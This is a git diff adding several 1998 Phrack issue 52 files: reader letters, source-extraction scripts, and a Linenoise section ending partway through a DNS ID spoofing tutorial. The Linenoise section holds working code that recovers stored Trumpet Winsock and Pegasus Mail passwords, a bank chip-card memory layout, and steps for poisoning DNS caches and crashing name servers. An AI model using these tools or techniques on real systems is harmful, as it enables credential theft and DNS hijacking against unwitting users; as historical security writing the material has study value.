+ONE bbs in Ireland and NO ONE I have spoken to does either. I don't expect you
+to know much about the hacking scene in Ireland but if you do know anything,
+anything at all could you please send it to me. I'm dying for information.
+Information that I can't get my hands on. If you don't know anything about it
+perhaps you know of some contacts.
+                         Please let me know. Cheers,
+                                                                  N0_eCH0
+
+PS. Keep up the good work at Phrack.       
+
+[ Ok, someone in Ireland help this guy out. ]
+
+0x39>-------------------------------------------------------------------------
+
+    hello my name is FUSION from a group called digital elite alliance and i
+was wondering if you would like to become allies with us. If so e-mail me back
+at XXXX@prodigy.net and then i'll get back to you.
+
+[ Don't hold your breath.  Wait.  On second thought, do. ]
+
+0x3a>-------------------------------------------------------------------------
+
+Daemon9,
+   Hi! I'd like to ask you a very common question. Maybe everyday you have
+received mails asking it. Yes, what I want to know is how to become a great
+hacker.
+
+[ Swing from the shoulders, not from the arms. ]
+
+   I am a freshman in university. I wanna to be a hacker, not for doing
+damage to others, but in my own view, being hacker require a lot of
+knowledge and creative. I aim at knowledge and want to find out new tech,
+while not just using others'. In fact, I have read many articles about how
+to become a hacker. And I have done them. 
+Now, I have mastered C, unix shell, and some of TCP/IP. 
+So what should I going to learn if I want to be a great hacker like you? 
+
+[ If you have mastered the aforementioned topics, you are far greater then I. ]
+
+I am learing socket programming and IP-spoofing now, do you have any resource 
+on the net to recommend to me?
+   Please write me back. Hoping to hear from you soon.
+
+Liu Jiangyi
+
+--
+
+Daemon9,
+   Hi, I forgot to ask you another question. Should I join a hacker group?
+And have you joined it? If so, please tell me which group I should join.
+And the mailing list, which one should a hacker join in your own view.
+   Hoping to hear from you soon!
+
+Liu Jiangyi
+
+
+0x3b>-------------------------------------------------------------------------
+
+[ A few letters to nirva and I.  I swear to GOD these aren't made up.  I
+  *couldn't* make stuff like this up. ]
+
+Hey Route,
+
+I was wondering if you knew what colours Nirva dyed his hair for
+defcon and who made the dye, I was also wondering if you had a copy
+of LISP lying around somewhere. Are you going to the KMFDM concert
+this friday by any chance? I was wondering if you have ever been bust
+for hacking or phreaking and how you manage to hack with the constant
+surveillance by the man? Also if you don't mind telling me, how did
+you get into hacking and did you have a mentor at any stage?
+
+Ciao and thankx
+
+--
+
+Hey Nirva,
+
+I was wondering how you got Real Kitty to drink coke out of those
+bottles from McDonalds (or is he just chewing on the straw). I was
+also wondering who Mike is currently going out with, not to mention
+you as well? If you could do me a favour and try to convince Mike to
+give me some webspace as well, I would really appreciate it.
+
+Thankx and Ciao
+
+--
+
+Hey Mike,
+
+How would you like to win a date win with carmen electra, if you
+would like to, go on over to durex.com and there's a link from there
+to the american site with the entry form to win the date, and being
+such a brilliant hacker I don't see how you couldn't manage to rig
+the contest ;)
+
+Thankx and Ciao
+
+0x3c>-------------------------------------------------------------------------
+
+Arggh , think of me what you will, but i Can't get over a pic on yer
+site of nirva, prolly one of the l33t3st looking individuals i've seen,
+in personal appearance (no, i aint gay), but anyway .. what are those
+things on his arms ? I saw that photo with the caption "nirva has
+rickets" or something, but are they implants ? ie part of his
+image/appearance or where they sum sort of weird disease he picked up ?
+
+[ Due to the vitaman-D embargo of 1975 - 1978 in New Mexico, nirva contracted
+  the rare disease osteomalacia (rickets).  He has it mostly licked these
+  days thanks to heavy amounts of vitamn-D laced EMF radition treatment he
+  undergoes 2 times a week.  Every now and then, however, he lapses, as you
+  can see from the aforementioned picture. ]
+
+tah man .. great page btw
+
+speaxx            
+
+0x3d>-------------------------------------------------------------------------
+
+----[  EOF
diff --git a/phrack52/20.txt b/phrack52/20.txt
new file mode 100644
index 0000000..98b08d3
--- /dev/null
+++ b/phrack52/20.txt
@@ -0,0 +1,269 @@
+---[  Phrack Magazine   Volume 8, Issue 52 January 26, 1998, article 20 of 20
+
+
+-------------------------[  Phrack Magzine Extraction Utility
+
+
+--------[  Phrack Staff
+
+
+    Added to the list of extraction variants this time is a version in AWK,
+    and a version in sh.  Also, the C version has ben spruced up to accept
+    file name globs.  Keep `em coming...
+
+
+---------------------8<------------CUT-HERE----------->8---------------------
+
+<++> PEU/extract2.c 
+/*  extract.c by Phrack Staff and sirsyko 
+ *
+ *  (c) Phrack Magazine, 1997 
+ *      1.8.98 rewritten by route:
+ *          - aesthetics
+ *          - now accepts file globs
+ *      todo:
+ *          - more info in tag header (file mode, checksum)
+ *  Extracts textfiles from a specially tagged flatfile into a hierarchical 
+ *  directory strcuture.  Use to extract source code from any of the articles 
+ *  in Phrack Magazine (first appeared in Phrack 50).
+ *
+ *  gcc -o extract extract.c
+ *  
+ *  ./extract file1 file2 file3 ...
+ */
+
+ 
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/stat.h>
+#include <string.h>
+#include <dirent.h>
+
+#define BEGIN_TAG   "<++> "
+#define END_TAG     "<-->"
+#define BT_SIZE     strlen(BEGIN_TAG)
+#define ET_SIZE     strlen(END_TAG)
+
+struct f_name
+{
+    u_char name[256];
+    struct f_name *next;
+};
+
+int
+main(int argc, char **argv)
+{ 
+    u_char b[256], *bp, *fn;
+    int i, j = 0;
+    FILE *in_p, *out_p = NULL; 
+    struct f_name *fn_p = NULL, *head = NULL; 
+
+    if (argc < 2)
+    {
+        printf("Usage: %s file1 file2 ... filen\n", argv[0]);
+        exit(0); 
+    }
+
+    /*
+     *  Fill the f_name list with all the files on the commandline (ignoring
+     *  argv[0] which is this executable).  This includes globs.
+     */
+    for (i = 1; (fn = argv[i++]); )
+    {
+        if (!head)
+        {
+            if (!(head = (struct f_name *)malloc(sizeof(struct f_name))))
+            {
+                perror("malloc");
+                exit(1);
+            }
+            strncpy(head->name, fn, sizeof(head->name));
+            head->next = NULL;
+            fn_p = head;
+        }
+        else
+        {
+            if (!(fn_p->next = (struct f_name *)malloc(sizeof(struct f_name))))
+            {
+                perror("malloc");
+                exit(1);
+            }
+            fn_p = fn_p->next;
+            strncpy(fn_p->name, fn, sizeof(fn_p->name));
+            fn_p->next = NULL;
+        }
+    }
+    /*
+     *  Sentry node.
+     */
+    if (!(fn_p->next = (struct f_name *)malloc(sizeof(struct f_name))))
+    {
+        perror("malloc");
+        exit(1);
+     }
+    fn_p = fn_p->next;
+    fn_p->next = NULL;
+
+    /*
+     *  Check each file in the f_name list for extraction tags.
+     */
+    for (fn_p = head; fn_p->next; fn_p = fn_p->next)
+    {
+        if (!(in_p = fopen(fn_p->name, "r")))
+        {
+            fprintf(stderr, "Could not open input file %s.\n", fn_p->name);
+	    continue;
+        }
+        else fprintf(stderr, "Opened %s\n", fn_p->name);
+        while (fgets(b, 256, in_p))
+        { 
+            if (!strncmp (b, BEGIN_TAG, BT_SIZE))
+            { 
+	        b[strlen(b) - 1] = 0;           /* Now we have a string. */
+                j++;
+
+                if ((bp = strchr(b + BT_SIZE + 1, '/')))
+                {
+                    while (bp)
+                    {
+		        *bp = 0;
+		        mkdir(b + BT_SIZE, 0700); 
+		        *bp = '/';
+		        bp = strchr(bp + 1, '/'); 
+		    }
+                }
+                if ((out_p = fopen(b + BT_SIZE, "w")))
+                {
+                    printf("- Extracting %s\n", b + BT_SIZE);
+                }
+                else
+                {
+		    printf("Could not extract '%s'.\n", b + BT_SIZE);
+		    continue;
+	        }
+	    } 
+            else if (!strncmp (b, END_TAG, ET_SIZE))
+            {
+	        if (out_p) fclose(out_p);
+	        else
+                {
+	            fprintf(stderr, "Error closing file %s.\n", fn_p->name);
+		    continue;
+	        }
+            } 
+            else if (out_p)
+            {
+                fputs(b, out_p);
+            }
+        }
+    }
+    if (!j) printf("No extraction tags found in list.\n");
+    else printf("Extracted %d file(s).\n", j);
+    return (0);
+}
+
+/* EOF */
+<-->
+<++> PEU/extract.pl
+# Daos <daos@nym.alias.net>
+#!/bin/sh -- # -*- perl -*- -n
+eval 'exec perl $0 -S ${1+"$@"}' if 0;
+
+$opening=0;
+
+if (/^\<\+\+\>/) {$curfile = substr($_ , 5); $opening=1;};
+if (/^\<\-\-\>/) {close ct_ex; $opened=0;}; 
+if ($opening) {                        
+        chop $curfile;                 
+        $sex_dir= substr( $curfile, 0, ((rindex($curfile,'/'))) ) if ($curfile =~ m/\//);
+        eval {mkdir $sex_dir, "0777";}; 
+        open(ct_ex,">$curfile"); 
+        print "Attempting extraction of $curfile\n";
+        $opened=1; 
+}
+if ($opened && !$opening) {print ct_ex $_}; 
+<-->
+
+<++> PEU/extract.awk
+#!/usr/bin/awk -f
+#
+# Yet Another Extraction Script
+# - <sirsyko>
+#
+/^\<\+\+\>/ {
+        ind = 1
+        File = $2
+        split ($2, dirs, "/")
+        Dir="."
+        while ( dirs[ind+1] ) {
+                Dir=Dir"/"dirs[ind]
+                system ("mkdir " Dir" 2>/dev/null")
+                ++ind
+        }
+        next
+}
+/^\<\-\-\>/ {
+        File = ""
+        next
+}
+File { print >> File }
+<-->
+
+<++> PEU/extract.sh
+#!/bin/sh
+# exctract.sh : Written 9/2/1997 for the Phrack Staff by <sirsyko>
+#
+# note, this file will create all directories relative to the current directory
+# originally a bug, I've now upgraded it to a feature since I dont want to deal
+# with the leading / (besides, you dont want hackers giving you full pathnames
+# anyway, now do you :)
+# Hopefully this will demonstrate another useful aspect of IFS other than 
+# haxoring rewt
+#
+# Usage: ./extract.sh <filename>
+
+cat $* | (
+Working=1
+while [ $Working ];
+do
+        OLDIFS1="$IFS"
+        IFS=
+        if read Line; then
+                IFS="$OLDIFS1"
+                set -- $Line
+                case "$1" in
+                "<++>") OLDIFS2="$IFS"
+                        IFS=/
+                        set -- $2
+                        IFS="$OLDIFS2"
+                        while [ $# -gt 1 ]; do
+                                File=${File:-"."}/$1
+                                if [ ! -d $File ]; then
+                                        echo "Making dir $File"
+                                        mkdir $File
+                                fi
+                                shift
+                        done                               
+                        File=${File:-"."}/$1
+                        echo "Storing data in $File"
+                ;;
+                "<-->") if [ "x$File" != "x" ]; then
+                                unset File
+                        fi ;;
+                *)      if [ "x$File" != "x" ]; then
+                                        IFS=
+                                        echo "$Line" >> $File
+                                        IFS="$OLDIFS1"
+                        fi
+                ;;
+                esac
+                IFS="$OLDIFS1"
+        else
+                echo "End of file"
+                unset Working
+        fi
+done
+)                                                                    
+<-->
+
+----[  EOF
diff --git a/phrack52/3.txt b/phrack52/3.txt
new file mode 100644
index 0000000..b2d6698
--- /dev/null
+++ b/phrack52/3.txt
@@ -0,0 +1,2531 @@
+---[  Phrack Magazine   Volume 8, Issue 52 January 26, 1998, article 03 of 20
+
+
+-------------------------[  P H R A C K     5 2     L I N E N O I S E
+
+
+--------[  Various
+
+0x1>-------------------------------------------------------------------------
+
+Upon discovering Doctor Jeep's "Trumpet Winsock Password Hacker" in P51-03, I
+felt obligated to share a small piece of code that I don't like to admit
+that I created, far earlier than the esteemed Jeep's published work.  As his
+requires access to a Pascal compiler and does not seem to be coded with
+portability in mind, the fact that my script requires Trumpet itself to run
+does not seem too great a hindrance.  The irony is that not only is the
+"cipher" a simple obfuscating XOR, but that Trumpet itself will decode it
+for you.
+
+<++> password.cmd
+# Put in Trumpet Winsock directory, run under "Dialer/Other"
+# Cannot currently use any file other than trumpwsk.ini,
+# apparently due to implementation errors in the "load" function
+display \n
+display "Trumpet Password Thief 1.0, 8-18-95"\n
+display \n
+if [load $username]
+        display "username: "
+        display $username\n
+else
+        display "ERR: cannot load username"\n
+end
+if [load $password]
+        display "password: "
+        display $password\n
+else
+        display "ERR: cannot load password"\n
+end
+display \n
+<-->
+    
+        - anonymous 
+
+0x2>-------------------------------------------------------------------------
+
+Another password decoder for ya... written long ago, I just never bothered to
+release it...
+
+<++> peg-dec.c
+/*
+ * Pegasus Mail Password Decoder v1.0 by Belgorath
+ */
+#include <stdio.h>
+
+/* Decoding/Encoding Tables */
+int dec1[1]= { 44 };
+int dec2[2]= { 16, 21 };
+int dec3[3]= { 10, 22, 28 };
+int dec4[4]= { 37, 28, 21, 7 };
+int dec5[5]= { 21, 22, 37, 28, 9 };
+int dec6[6]= { 22, 15, 28, 42, 17, 2 };
+int dec7[7]= { 15, 17, 21, 31,  0, 12, 19 };
+int dec8[8]= {  9,  2,  7, 20, 44, 22, 28, 23 };
+
+int *decz[8] = { dec1,dec2,dec3,dec4,dec5,dec6,dec7,dec8 };
+
+int decode_char(int numch, int ch, int pos)
+{
+  ch-=decz[numch-1][pos-1];
+  if(ch<-127) ch+=256;
+  return ch;
+}
+void main(void)
+{
+  int zz,x,nc;
+  char *tz;
+  int inps[20];
+
+  nc=0;
+  tz=malloc(8192);
+  printf("Enter Pegasus Mail Password: ");
+  gets(tz);
+
+/* Fun input parsing loop. Hope your malloc bzero's... */
+  while( *tz ) {
+    for(x=0;x<strlen(tz)+2;x++) {
+      if( (tz[x]==' ') || (tz[x]==0) ) {
+        tz[x]=0;
+        inps[nc]=atoi(tz);
+        nc++;
+        tz+=x+1;
+        break;
+      }
+    }
+  }
+
+/* Throw away anything past the end */
+  for(x=0;x<nc;x++) if(inps[x]==-1) nc=x+1;
+
+/* All pegasus passwords end in -1 */
+  if(inps[nc-1]!=-1) {
+    printf("Invalid Pegasus Mail Password.\n");
+    return;
+  }
+
+/* But we throw it away anyway */
+  nc--;
+
+  printf("Decoded Password: [");
+  for(x=1;x<nc+1;x++) putchar(decode_char(nc,inps[x-1],x));
+  printf("]\n");
+}
+<-->
+
+0x3>-------------------------------------------------------------------------
+    
+                       :----------------------------:
+                        Siemens Chip Card Technology
+
+                       .        by Yggdrasil        .
+                       :----------------------------:
+
+
+
+  Chip cards differ from one another in memory size, type of memory (PROM or
+EEPROM), security logic and micro-controller.  This article will discuss the
+Siemens SLE4404 chip card technology.
+
+  The SLE4404 is employed for electronic purse cards and bank transactions,
+cellular telephony (pre-payed cards), user IDs for access control, etc. (some
+examples: SmartCard, ViaCard and Italian Bancomat).  Its data can be accessed
+through a simple TTL serial channel, providing a +5 Vcc power supply from an
+external source.
+
+
+ Inside the chip
+ ~~~~~~~~~~~~~~~
+  The chipcard has at its disposal EEPROM memory consisting of a 416-bit matrix
+(each row is 16-bits) that is protected by security logic providing access 
+control.
+
+  This is the logic diagram:
+
+                  +------------------------+     +------------------+
+                  |     Address Counter    | --> |  Column Decoder  |
+                  +------------------------+     +------------------+
+                        ^             |                    | 16
+                        |             v                    v
+                  +-----------+  +---------+     +------------------+
+ C3,C8,C2,C5  --> | Control & |  | Row     |     | User mem 208 bit |
+ C1 (Vcc)     --> | Security  |  | Decoder | --> | Sec unit 192 bit |
+ C7 (I/O)    <--> | Logic     |  |         | 26  | Special mem unit |
+                  +-----------+  +---------+     +------------------+
+                        ^                                  ^
+                        |                                  |
+                        +----------------------------------+
+
+  The SLE4404 memory is subdivided in three main memory blocks: one is read
+only (a "PROM" containing the manufacturer code and/or a serial number and
+an expiration date), the second is both readable and writeable (user memory)
+and the last block cannot be written to unless the lock-out fuse has been 
+fused.
+
+  This is the memory map:
+
+  BLOCK TYPE         SIZE (BIT)   ADDRESS   READABLE   WRITEABLE   ERASEABLE
+-----------------------------------------------------------------------------
+ Manufacturer code       16          0-15     Yes         No           No
+ Application ROM         48         16-63     Yes         No           No
+ User code               16         64-79    [fuse]      U.C.         U.C.
+ Error counter            4         80-83     Yes        Yes          U.C.
+ EEPROM #1               12         84-95     Yes        Yes          U.C.
+ EEPROM #2               16        96-111     Yes        U.C.         U.C.
+ Frame memory block
+ - F.M. config            2       112-113     Yes        Yes       U.C./R.C.
+ - Frame memory         206       114-319    [cfg]      [cfg]      U.C./R.C.
+ Frame code              32       320-351    [fuse]     [fuse]       [cfg]
+ Frame counter           64       352-415     Yes        Yes         [cfg]
+-----------------------------------------------------------------------------
+
+  Meaning of abbreviations:
+
+ U.C.   -  User code required
+           (each time the code is entered the error counter is decreased)
+ R.C.   -  Frame code required
+           (each time the code is entered the frame counter is decreased)
+ [fuse] -  Operation allowed ONLY IF lock-out fuse is not fused
+ [cfg]  -  Operation allowed according to frame memory configuration
+
+  Frame memory configuration table:
+
+ BIT 112    BIT 113    MEMORY MODE    READABLE    WRITEABLE
+-----------------------------------------------------------------------------
+    0          0        Secret ROM      Yes           No
+    0          1          R.O.M.        Yes           No
+    1          0       Secret PROM      U.C.         U.C.
+    1          1         P.R.O.M.       U.C.         U.C.
+-----------------------------------------------------------------------------
+
+  The first 16-bit block is for the Manufacturer Code.  The following 48-bit
+block is called Application ROM, containing another code (Manufacturer sub
+code or info, serial number, sub-type of card, etc).
+
+  The User Code is the access code (PIN) used to read/write/erase memory.  
+This code can be modified provided that the fuse was not fused, while the
+error counter value can be modified even if the fuse was fused...
+
+  Please note that access to memory is blocked after four incorrect access
+trials (checked by the counter).  The same is for the Frame Code and the
+Frame [error] Counter (note that the number of incorrect accesses is limited
+to three trials instead of four).
+
+  Finally, the Frame Memory is generally used for storing personal user
+information or the credit limit (money that can be fetched in a bank 
+transaction, or the remaining "virtual" credit that a pre-payed cellular card
+contains).
+
+
+ The Pin-out
+ ~~~~~~~~~~~
+  This is the Siemens SLE4404 pin-out (N.C. stands for Not Connected):
+
++-------+-------------------+
+|  C 1  |    C  5           |    Contact  Pin   Info
+|       |                   |
++-------+           +-------+       1      6    Vcc +5V
+|  C 2  |           |  C 6  |       2      5    Reset
+|       |           |       |       3      4    Clock
++-------+           +-------+       4      3    Test input - N.C.
+|  C 3  |           |  C 7  |       5      8    Ground
+|       |           |       |       6      7    N.C.
++-------+           +-------+       7      1    Bi-directional I/O data line
+|  C 4  |           |  C 8  |       8      2    Control input (data change)
+|       |           |       |
++-------+-----------+-------+
+
+                 "I am for ever walking upon these shores,
+                  betwixt the sand and the foam.
+                  The high tide will erase my foot-prints,
+                  and the wind will blow away the foam.
+                  But the sea and the shore will remain
+                  For ever."
+                                        -- Gibran K. Gibran
+
+0x4>-------------------------------------------------------------------------
+                      ___      ______      _       _
+                    /     \   |   _   \   |  \   /  |
+                   |  / \  |  |  |  \  |  |   \_/   |
+                   | |___| |  |  |_ /  |  |   \_/   |
+..oO  THE          |  ---  |  |       /   |  |   |  |         CreW Oo..
+                   '''   '''   '''''''    ''''   ''''        
+                               presents
+
+                           DNS ID Hacking
+                    
+
+--[1]-- DNS ID Hacking Presentation
+
+You might be wondering what DNS ID Hacking (or Spoofing) is all about.  DNS ID
+Hacking isn't a usual way of hacking/spoofing such jizz or any-erect. This
+method is based on a vulnerability on DNS Protocol.  More brutal, the DNS ID
+hack/spoof is very efficient and very strong as there is no generation of DNS
+daemons that escapes from it (even WinNT!).
+
+--[1.1]-- DNS Protocol mechanism explanation
+
+In the first step, you must know how the DNS works.  I will only explain the
+most important facts of this protocol.  In order to do that, we will follow
+the way of a DNS request packet from A to Z!
+
+Name resolution example:
+The client (bla.bibi.com) sends a request of resolution of the domain
+"www.heike.com".  To resolve the name, bla.bibi.com uses "dns.bibi.com" for
+DNS.  Let's take a look at the following picture..
+
+/---------------------------------\
+| 111.1.2.123  =  bla.bibi.com    |
+| 111.1.2.222  =  dns.bibi.com    |
+| format:                         |
+| IP_ADDR:PORT->IP_ADDR:PORT      |
+| ex:                             |
+| 111.1.2.123:2999->111.1.2.222:53|
+\---------------------------------/
+...
+  gethosbyname("www.heike.com");
+...
+
+[bla.bibi.com]                                 [dns.bibi.com] 
+111.1.2.123:1999 ---> [?www.heike.com] ------> 111.1.2.222:53
+
+Here we see our resolution name request from source port 1999 which is asking
+to DNS on port 53 (note: DNS is always on port 53).  Now that dns.bibi.com has
+received the resolution request from bla.bibi.com, dns.bibi.com will have to
+resolve the name:
+
+[dns.bibi.com]                                   [ns.internic.net]
+111.1.2.222:53 --------> [dns?www.heike.com] ----> 198.41.0.4:53
+
+dns.bibi.com asks ns.internic.net who the root name server for the address
+of www.heike.com is, and if it doesn't have it and sends the request to a name
+server which has authority on '.com' domains (note: we send a request to the
+Internic because it could have this request in its cache).
+
+[ns.internic.net]                                         [ns.bibi.com]
+198.41.0.4:53 ------> [ns for.com is 144.44.44.4] ------> 111.1.2.222:53
+
+Here we can see that ns.internic.net answered to ns.bibi.com (which is the DNS
+that has authority over the domain bibi.com), that the name server of for.com
+has the IP 144.44.44.4 (let's call it ns.for.com).  Now our ns.bibi.com will
+ask to ns.for.com for the address of www.heike.com, but this one doesn't have
+it and will forward the request to the DNS of heike.com which has authority
+for heike.com.
+
+[ns.bibi.com]                                   [ns.for.com]
+111.1.2.222:53 ------> [?www.heike.com] -----> 144.44.44.4:53
+
+The answer from ns.for.com:
+
+[ns.for.com]                                                [ns.bibi.com]
+144.44.44.4:53 ------>[ns for heike.com is 31.33.7.4] ---> 144.44.44.4:53
+
+Now that we know which IP address has authority on the domain "heike.com"
+(we'll call it ns.heike.com), we ask it what's the IP of the machine 
+www.heike.com.
+
+[ns.bibi.com]                             [ns.heike.com]
+111.1.2.222:53 -----> [?www.heike.com] ----> 31.33.7.4:53
+
+We now have our answer:
+
+[ns.heike.com]                                             [ns.bibi.com]
+31.33.7.4:53 -------> [www.heike.com == 31.33.7.44] ----> 111.1.2.222:53
+
+Great we have the answer, we can forward it to our client bla.bibi.com.
+
+[ns.bibi.com]                                                 [bla.bibi.com]
+111.1.2.222:53 -------> [www.heike.com == 31.33.7.44] ----> 111.1.2.123:1999
+
+Now bla.bibi.com knows the IP of www.heike.com.
+
+Now let's imagine that we'd like to have the name of a machine from its IP, in
+order to do that, we proceed a bit differently as the IP will have to be
+transformed.
+
+Reverse name lookup resolution:
+100.20.40.3 will become 3.40.20.100.in-addr.arpa
+
+This method is only for the IP resolution request (reverse DNS).
+
+Let's look at a practical example of when we take the IP address of
+www.heike.com (31.33.7.44 or "44.7.33.31.in-addr.arpa" after the translation
+into a comprehensible format by DNS).
+
+...
+   gethostbyaddr("31.33.7.44");
+...
+
+We send our request to ns.bibi.com:
+
+[bla.bibi.com]                                            [ns.bibi.com]
+111.1.2.123:2600 -----> [?44.7.33.31.in-addr.arpa] -----> 111.1.2.222:53
+
+Which is forwarded to ns.internic.net:
+
+[ns.bibi.com]                                          [ns.internic.net]
+111.1.2.222:53 -----> [?44.7.33.31.in-addr.arpa] ------> 198.41.0.4:53 
+
+ns.internic.net will send the IP of a name server which has authority on
+'31.in-addr.arpa'.
+
+[ns.internic.net]                                             [ns.bibi.com]
+198.41.0.4:53 --> [DNS for 31.in-addr.arpa is 144.44.44.4] -> 111.1.2.222:53
+
+Now ns.bibi.com will ask the same question to the DNS at 144.44.44.4:
+
+[ns.bibi.com]                                          [ns.for.com]
+111.1.2.222:53 ----->[?44.7.33.31.in-addr.arpa]------> 144.44.44.4:53
+
+And so on.  The mechanism is nearly the same that was used for name resolution.
+
+--[1.2]-- DNS packet header
+
+Here is the format of a DNS message :
+    +---------------------------+---------------------------+
+    |     ID (the famous :)     |  flags                    |
+    +---------------------------+---------------------------+
+    |   numbers of questions    | numbers of answer         |
+    +---------------------------+---------------------------+
+    | number of RR authority    |number of supplementary RR |
+    +---------------------------+---------------------------+
+    |                                                       |
+    \                                                       \
+    \                   QUESTION                            \
+    |                                                       |
+    +-------------------------------------------------------+
+    |                                                       |
+    \                                                       \
+    \                    ANSWER                             \
+    |                                                       |
+    +-------------------------------------------------------+
+    |                                                       |
+    \                                                       \
+    \                  Stuff  etc..    No matter            \
+    |                                                       |
+    +-------------------------------------------------------+
+
+--[1.3]--  Structure of DNS packets.
+
+__ID__
+
+The ID permits us to identify each DNS packet, since exchanges between name
+servers are from port 53 to port 53, and more it might be more than one
+request at a time, so the ID is the only way to recognize the different DNS
+requests. Well talk about it later..
+
+__flags__
+
+The flags area is divided into several parts :
+
+       4 bits                    3 bits (always 0)
+       |                         |
+       |                         |
+[QR | opcode | AA| TC| RD| RA | zero | rcode ]
+                                         |
+ |           |__|__|__|                  |______ 4 bits
+ |                    |_ 1 bit
+ |
+1 bit
+
+QR     = If the QR bit = 0, it means that the packet is a question, otherwise
+         it's an answer.
+
+opcode = If the value is 0 for a normal request, 1 for a reserve request, and
+         2 for a status request (we don't need to know all these modes).
+
+AA     = If it's equal to 1, it says that the name server has an authoritative
+         answer.
+
+TC     = No matter
+
+RD     = If this flag is to 1, it means "Recursion Request", for example when
+         bla.bibi.com asks ns.bibi.com to resolve the name, the flag tells the
+         DNS to assume this request.
+
+RA     = If it's set to 1, it means that recursion is available.  This bit is
+         set to 1 in the answer of the name server if it supports recursion.
+
+Zero   = Here are three zeroes...
+
+rcode  = It contains the return error messages for DNS requests if 0, it means
+         "no error", 3 means "name error"
+
+The 2 following flags don't have any importance for us.
+
+DNS QUESTION:
+
+Here is the format of a DNS question :
+
++-----------------------------------------------------------------------+
+|                        name of the question                           |
++-----------------------------------------------------------------------+
+|       type of question         |      type of query                   |
++--------------------------------+--------------------------------------+
+
+The structure of the question is like this.
+
+example:
+www.heike.com  will be [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] 
+for an IP address, the format remains the same.
+
+44.33.88.123.in-addr.arpa would be:
+[2|4|4|2|3|3|2|8|8|3|1|2|3|7|i|n|-|a|d|d|r|4|a|r|p|a|0]
+[note]: a compression format exists, but we won't cover it.
+
+
+type of question:
+
+Here are the values that we will use much of the time (there are many more,
+but these are only ones relevant):
+
+  name    value
+   A    |   1    | IP Address          (resolving a name to an IP)
+   PTR  |   12   | Pointer             (resolving an IP to a name)
+
+
+type of query:
+
+The values are the same as the type of question.
+
+DNS ANSWER:
+
+Here is the format of an answer (an RR)
+
++------------------------------------------------------------------------+
+|      name of the domain                                                |
++------------------------------------------------------------------------+
+|   type                           |    class                            |
++----------------------------------+-------------------------------------+
+|                           TTL (time to live)                           |
++------------------------------------------------------------------------+
+| resource data length       |                                           |
+|----------------------------+                                           |
+|                       resource data                                    |
++-------------------------------------------------------------------------
+
+name of the domain:
+
+The name of the domain in reports to the following resource:  The domain name
+is stored in the same way that the part question for the resolution request of
+www.heike.com, the flag "name of the domain" will contain
+[3|w|w|w|5|h|e|i|k|e|3|c|o|m|0].
+
+type:
+
+The type flag is the same than "type of query" in the question part of the
+packet.
+
+class:
+The class flag is equal to 1 for Internet data.
+
+time to live:
+This flag explains in seconds the time-life of the information into the
+name server cache.
+
+resource data length: 
+The length of resource data, for example if resource data length is 4, it
+means that the data in resources data are 4 bytes long.
+
+resource data:  
+here we put the IP for example (at least in our case)
+
+I will offer you a little example that explains this better:
+
+Here is what's happening when ns.bibi.com asks ns.heike.com for 
+www.heike.com's address
+
+ns.bibi.com:53 ---> [?www.heike.com] ----> ns.heike.com:53 (Phear Heike ;)
+
++---------------------------------+--------------------------------------+
+|   ID = 1999                     | QR = 0 opcode = 0 RD = 1             |
++---------------------------------+--------------------------------------+
+| numbers of questions = htons(1) | numbers of answers = 0               |
++---------------------------------+--------------------------------------+
+| number of RR authoritative = 0  | number of supplementary RR = 0       |
++---------------------------------+--------------------------------------+
+<the question part>
++------------------------------------------------------------------------+
+|   name  of the question = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0]              |
++------------------------------------------------------------------------+
+|  type of question = htons(1)    |      type of query=htons(1)          |
++---------------------------------+--------------------------------------+
+
+here is for the question.
+
+now let's stare the answer of ns.heike.com
+
+ns.heike.com:53 -->[IP of www.heike.com is 31.33.7.44] --> ns.bibi.com:53
+
++---------------------------------+---------------------------------------+
+|   ID = 1999                     | QR=1 opcode=0 RD=1  AA =1  RA=1       |
++---------------------------------+---------------------------------------+
+| numbers of questions = htons(1) | numbers of answers = htons(1)         |
++---------------------------------+---------------------------------------+
+| number of RR authoritative = 0  | number of supplementary RR = 0        |
++---------------------------------+---------------------------------------+
++-------------------------------------------------------------------------+
+|   name  of the question = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0]               |
++-------------------------------------------------------------------------+
+|   type of question = htons(1)   |      type of query = htons(1)         |
++-------------------------------------------------------------------------+
++-------------------------------------------------------------------------+
+|   name of the domain = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0]                  |
++-------------------------------------------------------------------------+
+|       type        = htons(1)    |      class    = htons(1)              |
++-------------------------------------------------------------------------+
+|                       time to live = 999999                             |
++-------------------------------------------------------------------------+
+| resource data length = htons(4) | resource data=inet_addr("31.33.7.44") |
++-------------------------------------------------------------------------+
+
+Yah! That's all for now :))
+ 
+Here is an analysis:
+In the answer QR = 1 because it's an answer :)
+AA = 1 because the name server has authority in its domain
+RA = 1 because recursion is available
+
+Good =) I hope you understood that cause you will need it for the following
+events.
+
+--[2.0]-- DNS ID hack/spoof
+
+Now it's time to explain clearly what DNS ID hacking/spoofing is.
+Like I explained before, the only way for the DNS daemon to recognize
+the different questions/answers is the ID flag in the packet. Look at this
+example:
+
+ns.bibi.com;53 ----->[?www.heike.com] ------> ns.heike.com:53
+
+So you only have to spoof the ip of ns.heike.com and answer your false
+information before ns.heike.com to ns.bibi.com!
+
+ns.bibi.com <------- . . . . . . . . . . .  ns.heike.com 
+                   |
+                   |<--[IP for www.heike.com is 1.2.3.4]<-- hum.roxor.com 
+
+But in practice you have to guess the good ID :) If you are on a LAN, you
+can sniff to get this ID and answer before the name server (it's easy on a
+Local Network :)
+
+If you want to do this remotely you don't have a lot a choices, you only
+have 4 basics methods:
+
+1.) Randomly test all the possible values of the ID flag. You must answer
+    before the ns ! (ns.heike.com in this example). This method is obsolete
+    unless you want to know the ID .. or any other favorable condition to
+    its prediction.
+
+2.) Send some DNS requests (200 or 300) in order to increase the chances
+    of falling on the good ID.
+
+3.) Flood the DNS in order to avoid its work. The name server will crash
+    and show the following error!
+
+    >> Oct 06 05:18:12 ADM named[1913]: db_free: DB_F_ACTIVE set - ABORT
+       at this time named daemon is out of order :)
+
+4.) Or you can use the vulnerability in BIND discovered by SNI (Secure
+    Networks, Inc.) with ID prediction (we will discuss this in a bit).  
+
+
+##################### Windows ID Vulnerability ###########################
+
+I found a heavy vulnerability in Windows 95 (I haven't tested it on
+WinNT), lets imagine my little friend that's on Windows 95.
+Windows ID's are extremely easy to predict because it's "1" by default :))) 
